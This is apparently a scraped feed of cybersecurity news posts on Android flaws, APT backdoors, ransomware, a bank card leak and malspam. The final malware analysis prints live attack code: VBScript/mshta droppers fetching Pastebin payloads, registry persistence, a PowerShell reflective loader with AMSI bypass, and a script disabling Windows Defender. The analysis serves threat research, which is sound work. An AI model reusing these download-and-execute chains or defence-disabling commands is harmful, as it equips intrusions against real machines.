StrandHogg 1.0 could be used to attack apps one at a time, StrandHogg 2.0 allow attackers “dynamically attack nearly any app on a given device simultaneously at the touch of a button,” all without requiring a pre-configuration for each targeted app.

“If the victim then inputs their login credentials within this interface, those sensitive details are immediately sent to the attacker, who can then login to, and control, security-sensitive apps,” Promon says.

“Utilizing StrandHogg 2.0, attackers can, once a malicious app is installed on the device, gain access to private SMS messages and photos, steal victims’ login credentials, track GPS movements, make and/or record phone conversations, and spy through a phone’s camera and microphone.”

StrandHogg 2.0.

Targeted users could not spot the StrandHogg attack, which can be exploited without root access and works on all versions of Android.

The new flaw can be used for various types of phishing attack, such as displaying a fake login screen, gathering different types of sensitive information, denial of service, and/or collecting permissions
under the guise of the target app (such as SMS, GPS positioning and more).

Experts reported the flaw to Google in December, the tech giant released a security patch to manufacturing companies in April 2020, that are going to release security updates to their devices.

Below the PoC video released by the experts:

Pierluigi Paganini

(SecurityAffairs – StrandHogg 2.0 , hacking)

The post StrandHogg 2.0 Android flaw affects over 1 Billion devices appeared first on Security Affairs.

New Turla ComRAT backdoor uses Gmail for Command and Control

Researchers uncovered a new advanced variant of Turla’s ComRAT backdoor that leverages Gmail’s web interface as C2 infrastructure.

Cybersecurity researchers discovered a new version of the ComRAT backdoor, also known as Agent.BTZ, which is a malware that was employed in past campaigns attributed to the Turla APT group.

Earlier versions of Agent.BTZ were used to compromise US military networks in the Middle East in 2008.

The new variant leverages Gmail’s web interface to covertly receive commands and exfiltrate sensitive data.

ComRAT v4 appeared in the threat landscape in 2017 and is still used by threat actors, recently a new variant was used in attacks against two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region.

ComRAT turla 2.png

This new version was developed from scratch and is far more complex than its predecessors. 

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

ComRAT is a sophisticated backdoor developed in C++, it could perform many malicious actions on the infected systems, such as executing additional payloads or exfiltrating files.

The backdoor uses a Virtual FAT16 File System formatted in FAT16, it is deployed using existing access methods, including the PowerStallion PowerShell backdoor.

ComRAT leverages the following C2 channels:

  • HTTP: It uses exactly the same protocol as ComRAT v3
  • Email: It uses the Gmail web interface to receive commands and exfiltrate data

The main components of the of the ComRAT v4 are:

  • an orchestrator, which is injected into explorer.exe process and is used to control most of ComRAT functions.
  • a communication module (a DLL), which is injected into the default browser by the orchestrator. It communicates with the orchestrator using a named pipe.
  • a Virtual FAT16 File System, containing the configuration and the logs files.

“The main use of ComRAT is discovering, stealing and exfiltrating confidential documents. In one case, its operators even deployed a .NET executable to interact with the victim’s central MS SQL Server database containing the organization’s documents.” reads the report published by the experts.

To evade detection, ComRAT files, with the exception of the orchestrator DLL and the scheduled task for persistence, are stored in a virtual file system (VFS). The default VFS container file is hardcoded in the orchestrator components that drops the first time it is executed.

The C&C “mail” mode was specific to the Gmail email provider.

The orchestrator reads the email address in /etc/transport/mail/mailboxes/0/command_addr by parsing the inbox HTML page (using Gumbo HTML parser) and the cookies to authenticate on Gmail in /etc/transport/mail/mailboxes/0/cookie.
The cookies have a limited lifetime so they should be updated from each interaction.

The Gmail parser could get the list of emails with subject lines that match those in a “subject.str” file in the VFS.

The comRAT backdoor downloads the attachments (e.g. “document.docx,” “documents.xlsx”) from each email that meets the above criteria, then it deleted the emails to avoid processing them twice.

Despite their extensions, the attachments are not Office documents, but rather encrypted blobs of data that include a specific command to be executed.

The backdoor creates an attachment containing the result of the commands, its name consists of 20 random digits and of the .jpg.bfe so-called double extension.

The analysis of the time of day that commands were sent in a one-month period reveals that the operators are working in the UTC+3 or UTC+4 time zone.

“Version four of ComRAT is a totally revamped malware family released in 2017,” ESET concludes. “Its most interesting features are the Virtual File System in FAT16 format and the ability to use the Gmail web UI to receive commands and exfiltrate data. Thus, it is able to bypass some security controls because it doesn’t rely on any malicious domain.”

Pierluigi Paganini

(SecurityAffairs – Tesla, hacking)

The post New Turla ComRAT backdoor uses Gmail for Command and Control appeared first on Security Affairs.

Malware opens RDP backdoor into Windows systems

A new version of the Sarwent malware can open the Remote Desktop Protocol (RDP) port on target Windows computers to make sure that crooks can find their way back into the system through the backdoor. Whether that access is used later by the same crooks or sold to ransomware gangs or cyber espionage groups is unknown, but affected users should know that removing the malware does not close that particular “backdoor”. Sarwent’s new capabilities Sarwent … More

The post Malware opens RDP backdoor into Windows systems appeared first on Help Net Security.

Ragnar Ransomware encrypts files from virtual machines to evade detection

Ransomware encrypts from virtual machines to evade antivirus

Ragnar Locker deploys Windows XP virtual machines to encrypt victim’s files, the trick allows to evaded detection from security software.

Crooks always devise new techniques to evade detection, the Ragnar Locker is deploying Windows XP virtual machines to encrypt victim’s files while bypassing security measures.

The Ragnar Locker appeared relatively in the threat landscape, at the end of the 2019 it was employed in attacks against corporate networks. 

One of the victims of the ransomware is the energy giant Energias de Portugal (EDP), where the attackers claimed to have stolen 10 TB of files.

While many ransomware infections terminate security programs before encrypting,

This sample of Ragnar Locker terminates security programs and managed service providers (MSP) utilities to prevent them from blocking the attack.

“A new ransomware attack method takes defense evasion to a new level—deploying as a full virtual machine on each targeted device to hide the ransomware from view. In a recently detected attack, Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine.” reads the report published by Sophos. “The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.”

The attack chain starts with the creation of a tool folder that includes VirtualBox, a mini Windows XP virtual disk called micro.vdi, which is an image of a stripped-down version of the Windows XP SP3 OS (MicroXP v0.82). The image includes the 49 kB Ragnar Locker ransomware executable, the attack also includes several executables and scripts to prep the environment.

Ragnar Locker ransomware

The malware leverage a VirtualBox feature that allows the host operating system to share folders and drives as a network share inside a virtual machine.  The virtual machine mounts the shared path as a network drive from the \\VBOXSVR virtual computer to access their content.

“In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script.” continues the analysis. “The script’s first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys.”

The install.bat batch file allows the threat to scan for local drives and mapped network drives on the host and builds a configuration file that automatically shares them with the virtual machine.

The script also prepares an sf.txt file containing VirtualBox configuration settings to automatically share all of the drives on the computer with the virtual machine.

The attackers launch the Windows XP virtual machine using the SharedFolder directives created by their batch file that are accessible within the virtual machine. and the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

When launched, all of these shared drives will now be accessible from within the virtual machine. Experts pointed you that the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

Windows XP virtual machine
Windows XP virtual machine
(Source: Sophos)

Also included is a vrun.bat file that is located in the Startup folder so that it is launched immediately when the virtual machine starts.

This vrun.bat file, shown below, will mount each shared drive, encrypt it, and then proceed to the next drive shared with the virtual machine.

Mounting all the shared drives to encrypt
Mounting all the shared drives to encrypt

As the security software running on the victim’s host will not detect the ransomware executable or activity on the virtual machine, it will happily keep running without detecting that the victim’s files are now being encrypted.

It should be noted that if the victim was running Windows 10’s Controlled Folder Access anti-ransomware feature, it may have been protected from an attack like this as the operating system would have detected writes to the protected folders.

When done, the victim will find a custom ransom note on their computer explaining how their company was breached, and their files were encrypted.

Custom Ragnar Locker ransom note
(Source: Sophos)

The use of a virtual machine to encrypting a device’s files without being detected is an innovative approach.

As VirtualBox and a Windows XP virtual machine are not considered malicious, most security software will not be concerned that it is blissfully writing to all the data on the computer.

This attack illustrates how security software with behavioral monitoring is becoming more important to stem the tide of ransomware infections.

Only by detecting the unusual mass file writes, would this attack be detected.

Pierluigi Paganini

(SecurityAffairs – Ragnar Locker ransomware, hacking)

The post Ragnar Ransomware encrypts files from virtual machines to evade detection appeared first on Security Affairs.

Maze ransomware operators leak credit card data from Costa Rica’s BCR bank

Maze ransomware operators published credit card details stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Maze ransomware operators have released credit card data stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Early May, Maze Ransomware operators claimed to have hacked the network of the state-owned Bank of Costa Rica Banco BCR and to have stolen internal data, including 11 million credit card credentials.

Banco BCR has equity of $806,606,710 and assets of $7,607,483,881, it is one of the most solid banks in Central America.

The hackers claim to have compromised the Banco BCR’s network in August 2019, and had the opportunity to exfiltrate its information before encrypting the files.

Maze Ransomware crew

According to Maze, the bank’s network remained unsecured at least since February 2020.

Anyway, the group explained that they did not encrypt the bank documents in February, because it “was at least incorrect during the world pandemic”.

The stolen data includes 4 million unique credit card records, and 140,000 allegedly belonging to USA citizens.

Now the Maze ransomware operators published a post on their leak site along with a spreadsheet (2GB in size) containing the payment card numbers from customers of Banco de Costa Rica (BCR).


The threat actors decided to leak the credit card number to lack of security measures implemented by the bank.

Security firm Cyble confirmed the data leak, over 2GB of data.

“Just like previously, the Cyble Research Team has verified the data leak, which consists of a 2GB CSV file containing details of various Mastercard and Visa credit cards or debit cards.” reads the post published by Cyble. “As per Cyble’s researchers, the Maze ransomware operators have made this data leak due to the Banco de Costa not taking the previous leaks seriously. Along with that, the Maze ransomware operators have threatened the BCR about this type of leak going to happen every week.”

Maze ransomware operators published screenshots showing unencrypted Visa or MasterCard credit card numbers, all the cards have been issued by BCR.

The BCR bank always denied that its systems have been hacked by the Maze gang.

“After multiple analyzes carried out by internal and external specialists in computer security, no evidence has been found to confirm that our systems have been violated. The permanent monitoring of our clients’ transactions confirms that none has been affected.” reads the last statement published by the bank.

Pierluigi Paganini

(SecurityAffairs – BCR, hacking)

The post Maze ransomware operators leak credit card data from Costa Rica’s BCR bank appeared first on Security Affairs.

Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 17 – May 23, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 265

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Elexon, a middleman in the UK power grid network hit by cyber-attack
Experts reported the hack of several supercomputers across Europe
A bug in Edison Mail iOS app impacted over 6,400 users
FBI warns US organizations of ProLock ransomware decryptor not working
Mandrake, a high sophisticated Android spyware used in targeted attacks
Stored XSS in WP Product Review Lite plugin allows for automated takeovers
Texas Department of Transportation (TxDOT) hit by a ransomware attack
129 million records of Russian car owners available on the dark web
Australian product steel producer BlueScope hit by cyberattack
Bluetooth BIAS attack threatens billions of devices
Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways
Easyjet hacked: 9 million customers data exposed along with 2,200+ credit card details
Hackers Target Oil Producers During COVID-19 Slump
Adobe fixed several memory corruption issues in some of its products
Israel is suspected to be behind the cyberattack on Iranian port
Researchers disclose five Microsoft Windows zero-days
Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials
Three flaws in Nitro Pro PDF reader expose businesses to hack
VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director
Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia
Japan suspects HGV missile data leak in Mitsubishi security breach
Meal delivery service Home Chef discloses data breach
Santander, one of the biggest European banks, was leaking sensitive data on their website
Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware
Tens of thousands Israeli websites defaced
Cyber-Criminal espionage Operation insists on Italian Manufacturing
Experts found a Privilege escalation issue in Docker Desktop for Windows
Microsoft warns of massive campaign using COVID-19 themed emails
Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry
Experts observed a spike in COVID-19 related malspam emails containing GuLoader
Silent Night Zeus botnet available for sale in underground forums
The Florida Unemployment System suffered a data breach
Voter information for 2 millions of Indonesians leaked online

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 265 appeared first on Security Affairs.

Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

Researchers from Vipre Labs observed a spike in the use of GuLoader in COVID-19-themed campaign since March 2020.


The discovery confirms that crooks continue to use COVID-19 lures in malspam campaigns. In the campaign monitored by Vipre Labs, attackers used spam email samples containing GuLoader.

The GuLoader is a popular RAT that appeared in the threat landscape in 2019 and that was involved in other COVID-19 campaigns, it is written in VB5/6 and compressed in a .rar/.iso file. 

GuLoader is usually employed in spam campaigns using bill payments, wire transfers or COVID lures.

In the last campaign observed by experts, the downloader utilizes cloud hosting services to keep the payload encrypted.

“This malware downloader utilizes cloud hosting services like Microsoft OneDrive or Google Drive to keep its payload encrypted. Also, GuLoader is used to download Remote Access Trojan (RAT) or files that allow attackers to control, monitor, or steal information on the infected machine.” reads the analysis.

The malware implements anti-analysis techniques, such as an anti-debugger. In order to achieve persistence, GuLoader creates a folder in which to place a copy of itself and modifies a registry key.

Now the loader implements process hollowing and use the child processes to download, decrypt, and map the payload into memory.

Common payloads downloaded by the loader are Formbook, NetWire, Remcos, Lokibot, and others.

The analysis published by Vipre Labs includes technical details about the threats, including Indicators of Compromise (IoCs).

In early March, experts at MalwareHunterTeam uncovered a COVID-19-themed campaign that was distributing the GuLoader malware to deliver the FormBook information-stealing Trojan.

The campaign was using emails that pretend to be sent by members of the World Health Organization (WHO).

Pierluigi Paganini

(SecurityAffairs – COVID-19, malspam)

The post Experts observed a spike in COVID-19 related malspam emails containing GuLoader appeared first on Security Affairs.

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night based on the Zeus banking Trojan that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that included technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaign. 

Silent Night

The source code of the Zeus Trojan is available in the cybercrime underground since 2011 allowing crooks to develop their own release since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” Zbot is likely a reference to a weapon mentioned in the 2002 movie xXx, it was first spotted in November 2019 when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe was advertising the Trojan as the result of over five years of work, a total of 15k ~ hours were spent for the development of the malicious code.

“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”.” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build, $2,000 per month for a general build, while an extra for HVNC functionality is available for 1,000 USD/month and 14 days to test the code for 500 USD.

Experts believe that Axe is the developer of the Axe Bot 1.4.1, comparing Axe Bot 1.4.1 and Zloader 1.8.0 C2 source codes, experts noted that all of their custom PHP functions have the prefix CSR, which can either be a naming space or a developer’s handle

Silent Night is able to grab information from online forms and perform web injections in major browsers, including Google Chrome, Mozilla Firefox, and Internet Explorer, monitor keystrokes, take screenshots, harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains or to grab the login credentials for online banking services. Data collected by the malware are then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator, the decryption is performed only “on demand.” The analysis of the content of an open directory on the Command and Control server allowed the researchers to discover a manual for bot operators that includes instructions for the set up of the malware.

On Dec 23 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit, experts observed small campaigns, likely for testing purposes. The spreading intensified over time, in March 2020, it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

The post Silent Night Zeus botnet available for sale in underground forums appeared first on Security Affairs.

Cyber-Criminal espionage Operation insists on Italian Manufacturing

ZLab researchers spotted a new malicious espionage activity targeting Italian companies operating worldwide in the manufacturing sector.


During our Cyber Threat Intelligence monitoring we spotted new malicious activities targeting some Italian companies operating worldwide in the manufacturing sector, some of them also part of the automotive production chain.

The group behind this activity is the same we identified in the past malicious operations described in Roma225 (12/2018), Hagga (08/2019), Mana (09/2019), YAKKA (01/2020). This actor was first spotted by PaloAlto’s UNIT42 in 2018 during wide scale operations against technology, retail, manufacturing, and local government industries in the US, Europe and Asia. They also stated the hypothesis of possible overlaps with the Gorgon  APT group, but no clear evidence confirmed that.

However, in order to keep track of all of our report, we synthesized all the monitored campaigns, with their TTPs and final payload:

Table 1: Synthetic table of the campaigns

As we can see from the table, the Aggah campaigns varied in the time, but it maintained some common points. All campaigns used as the initial stage an office document (PowerPoint or Excel) armed with macro and some of them used injection methods. 

All attack operations used a “Signed Binary Proxy Execution” technique abusing Mshta, a legit Microsoft tool, and used at least an executable file for the infection. In addition, the use of PowerShell stage or the abuse of legit web service has been reported in some campaigns. 

Furthermore the CMSTP bypass exploit is a new feature present only in the 2020, because the first malwares identified to exploit this vulnerability all date back to mid/end 2019, making think the fact that the Threat Actor likes to test the latest disclosed exploits in order to make its campaigns always at the forefront. Regarding persistence mechanisms, we note that initially scheduled tasks were used, but in the latest infections the registry run keys were used. All threats use at least one obfuscation method to make the analysis harder. 

Looking at the evolution of the final payloads, we can say that this evolution is certainly due to a chronological factor, since Revenge rat had become obsolete, but the evolution is also due to the technological factor and its means: revenge rat has the classic functionality of spyware, while AZORult is considered an info stealer. As a last payload, Agent Tesla was used which collects all the functionality of the previous payloads as it is considered an info stealer and spyware.

Technical Analysis

The infection chain starts with a malicious Microsoft Powerpoint weaponized with a malicious macro.

ThreatMalicious macro
Brief DescriptionMalicious ppt dropper with macro.

Table 2. Sample information

The content of the macro is quite easy to read and the content is short and easy to read:

Figure 1: Content of the malicious macro

The VBA macro is responsible to download and execute malicious code retrieved from pastebin.  j[.mp is an url shortening service, the following request redirect and download a pastebin content:

Figure 2: Shortener resolution

The MSHTA Drop Chain

Like the previous campaigns, this threat actor uses a Signed Binary Proxy Execution (ID: T1218) technique abusing “mshta.exe” (T1170) a signed and legit Microsoft tool. Adversaries can use mshta.exe to proxy execution of malicious .hta files, Javascript or VBScript.

Figure 3: Piece of code of the Bnv7ruYp paste

As shown in the above figure, the code is simply URI encoded by replacing each instance of certain characters by one, two or three escape sequences representing the UTF-8 encoding of the character. 

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>’id1CreateObject(“WScript.Shell”).Run “””mshta””””http:\\\raw\5CzmZ5NS”””
CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn “”Pornhubs”” /tr “”\””mshta\””http:\\\raw\5CzmZ5NS”” /F “,0
‘id2CreateObject(“WScript.Shell”).RegWrite StrReverse(“TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\\raw\sJEBiiMw”””, “REG_SZ”‘id3CreateObject(“WScript.Shell”).RegWrite StrReverse(“\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\\raw\YL0je2fU”””, “REG_SZ”

‘defidCreateObject(“WScript.Shell”).Run “””mshta””””http:\\\raw\UyFaSxgj”””CreateObject(“WScript.Shell”).RegWrite StrReverse(“FED\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\\raw\UyFaSxgj”””, “REG_SZ”


Code Snippet 1

This stage acts as a dropper, in fact, it downloads and executes some pastebin contents through mshta.exe. 

Figure 4: Evidence of the NIBBI author

This lasta campaign has been dubbed with the name of the Pastebin user spreading the malicious pastes. This time the name is “NIBBI”. The first component is 5CzmZ5NS:

Figure 5: Piece of the code of 5CzmZ5NS paste

The second one is sJEBiiMw:

Figure 6: Piece of the code of the sJEBiiMw paste

The third one, YL0je2fU:

Figure 7: Piece of the code of the YL0je2fU paste

and the fourth component, UyFaSxgj:

Figure 8: Piece of the code of the UyFaSxgj paste

This obfuscation technique is typical of this particular actor and he largely leveraged it in many malicious operations. Moreover, the usage of a legit website such as pastebin (T1102) gives a significant amount of cover such as advantages of being very often whitelisted. Using such a service permits to reduce the C2 exposure. In the past, other groups also used similar techniques to decouple attack infrastructure information from their implant configuration, groups such as APT41, FIN6 or FIN7.

Once decoded the first component (5CzmZ5NS), it unveils some logic, as shown in Code Snippet 2. First of all, the script set a registry key, as a windows persistence mechanism (T1060) in which it place the execution of the following command: “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\bin”, “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX””””, 0 : window.close””)”, “REG_SZ”
CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\iamresearcher”, “$fucksecurityresearchers=’contactmeEX’.replace(‘contactme’,’I’);sal M $fucksecurityresearchers;do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);$iwannajoinuiwannaleavedsshit = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $iwannajoinuiwannaleavedsshit;$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;$‘GET’,’’,$false);$iwannaleftsellingtools.send();$iwannaleftsellingtoolsy=$iwannaleftsellingtools.responseText;$asciiChars= $iwannaleftsellingtoolsy -split ‘-‘ |ForEach-Object {[char][byte]””0x$_””};$asciiString= $asciiChars -join ”|M;[Byte[]]$Cli2= iex(iex(‘(&(GCM *W-O*)’+ ‘Net.’+’WebC’+’lient)’+’.Dow’+’nload’+’Str’+’ing(””).replace(”#”,”!#!@#”).replace(”!#!@#”,”0x”)’)) | g;$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);[rOnAlDo]::ChRiS(‘InstallUtil.exe’,$Cli2)” , “REG_SZ”
Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ((gp HKCU:\Software).iamresearcher)|IEX”, null, objConfig, intProcessID)’i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my way’i am not a coder 😉 i watch you on twitter every day thanks 🙂 i love my code reports!’i am not a coder! bang 😉

Code Snippet 2

The code contains some “funny” comments related to the twitter community of security researchers which constantly monitor the actor operations. Then, the final payload is identified by Rk4engdU paste.

Figure 9: Piece of the rnS6CUz paste

Decoding this hex stream we get the following powershell code:

function UNpaC0k3333300001147555 {
[CmdletBinding()]    Param ([byte[]] $byteArray)  Process {     Write-Verbose “Get-DecompressedByteArray”        $input = New-Object System.IO.MemoryStream( , $byteArray )     $output = New-Object System.IO.MemoryStream            $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
    $puffpass = New-Object byte[](1024)    while($true){        $read = $01774000.Read($puffpass, 0, 1024)        if ($read -le 0){break}        $output.Write($puffpass, 0, $read)        }        [byte[]] $bout333 = $output.ToArray()        Write-Output $bout333    }}
$t0=’DEX’.replace(‘D’,’I’);sal g $t0;[Byte[]]$MNB=(‘OBFUSCATED PAYLOAD ONE‘.replace(‘@!’,’0x’))| g;
[Byte[]]$blindB=(‘OBFUSCATED PAYLOAD TWO‘.replace(‘@!’,’0x’))| g
[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB
[byte[]]$decompressedByteArray = UNpaC0k3333300001147555  $MNB

Code Snippet 3 

The Powershell Loader

The Code Snippet 3 is a Powershell script in which the function “UNpaC0k3333300001147555” is declared, having the purpose to manipulate the two payloads in the right way. Both of them are .NET binaries. The de-obfuscated code is stored in the deblindB variable and then executed.

As suggested by the name deblindB, invoke the execution of the static method “Bypass” of the “Amsi” class.

Figure 10: Amsi Bypass exploit evidence

Instead, the payload embedded inside the variable $MNB is another type of injection tool, but this one is not executed by the script, probably because both the binaries perform the same action and only one is sufficient.

At this point, we deepen the “sJEBiiMw” component obtaining:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg(‘h’+’t’+’t’+’p’+’s’+’:’+’/’+’/’+’p’+’a’+’s’+’t’+’e’+’b’+’i’+’n’+’.’+’c’+’o’+’m’+’/’+’r’+’a’+’w’+’/ygwLUS9C’));$_Xpin=$_Xpin.replace(‘.’,’*!(@*#(!@#*’).replace(‘*!(@*#(!@#*’,’0′);$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)”, null, objConfig, intProcessID)

Code Snippet 4

This script downloads and executes another script from pastebin: ygwLUS9C. It is a base64 encoded script with some basic string replacing. We also noticed this executable uses the CMSTP bypass technique (T1191), already seen in our previous report.

Figure 11: CMSTP Bypass evidence

However, in this case, there is a new element differently the previous version: through the CMSTP bypass, a VBS script is written in the “\%TEMP%\” folder, which executes many disruptive commands:

Figure 12: Evidence of the VBS script loaded and executed

The VBS script, as also mentioned inside the first row as comment, has the objective to set to zero the level of security of the infected machine. The script is the following:

‘this script will put system on 0 securityIf Not WScript.Arguments.Named.Exists(“elevate”) Then  CreateObject(“Shell.Application”).ShellExecute WScript.FullName _    , “””” & WScript.ScriptFullName & “”” /elevate”, “”, “runas”, 1  WScript.QuitEnd If
On Error Resume NextSet WshShell = CreateObject(“WScript.Shell”)WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable”,”0″,”REG_DWORD”
WScript.Sleep 100
outputMessage(“Set-MpPreference -DisableRealtimeMonitoring $true”)outputMessage(“Set-MpPreference -DisableBehaviorMonitoring $true”)outputMessage(“Set-MpPreference -DisableBlockAtFirstSeen $true”)outputMessage(“Set-MpPreference -DisableIOAVProtection $true”)outputMessage(“Set-MpPreference -DisableScriptScanning $true”)outputMessage(“Set-MpPreference -SubmitSamplesConsent 2”)outputMessage(“Set-MpPreference -MAPSReporting 0”)outputMessage(“Set-MpPreference -HighThreatDefaultAction 6 -Force”)outputMessage(“Set-MpPreference -ModerateThreatDefaultAction 6”)outputMessage(“Set-MpPreference -LowThreatDefaultAction 6”)outputMessage(“Set-MpPreference -SevereThreatDefaultAction 6”)

Sub outputMessage(byval args)On Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ” + args, null, objConfig, intProcessID)

